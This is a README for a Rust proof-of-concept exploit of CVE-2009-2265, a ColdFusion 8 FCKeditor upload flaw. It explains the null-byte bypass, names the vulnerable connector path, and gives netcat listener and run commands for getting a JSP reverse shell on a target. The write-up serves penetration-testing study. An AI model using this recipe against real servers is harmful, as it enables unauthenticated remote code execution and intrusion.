CVE-2009-2265 - Adobe ColdFusion 8 File Upload RCE

RustSecurity

Repository

A Rust implementation of the POC for the CVE-2009-2265 exploit, targeting Adobe ColdFusion 8.

Vulnerability Overview

This vulnerability allows an unauthenticated attacker to upload arbitrary files to a web-accessible directory on a server running Adobe ColdFusion 8, leading to Remote Code Execution (RCE).

Technical Details

  • Vulnerability: Directory Traversal via Null Byte Injection
  • Component: FCKeditor upload.cfm connector
  • Parameter: CurrentFolder
  • Impact: Remote Code Execution (RCE)
  • Affected Software: Adobe ColdFusion 8.0.1 and earlier

Description

The vulnerability exists in the file upload functionality of the FCKeditor component located at /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. The CurrentFolder HTTP GET parameter is not properly sanitized, allowing for a null byte (%00) injection attack.

By crafting a request where the CurrentFolder parameter is set to /<filename>.jsp%00, an attacker can bypass the server-side extension checks. The underlying system (often Java) interprets the null byte as the end of the string, treating the filename as <filename>.jsp. This allows the attacker to upload a malicious JSP file. The server saves this file to a publicly accessible directory (/userfiles/file/), from where it can be executed by simply accessing its URL.

This POC automates the process by generating a JSP reverse shell payload, uploading it using the null byte vulnerability, and triggering it to gain a shell on the target system.

Usage

Follow these steps to compile and run the exploit.

Step 1: Set up a Netcat Listener

Before running the exploit, start a listener on your local machine to catch the incoming reverse shell.

nc -lnvp <attacker-port>

Step 2: Run the Exploit

Execute the compiled binary, providing your local host/port for the reverse shell and the remote target's host/port.

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

After the script triggers the payload, you should receive a connection on your Netcat listener.

Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to.

Tags

cve-2009-2265

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-10-03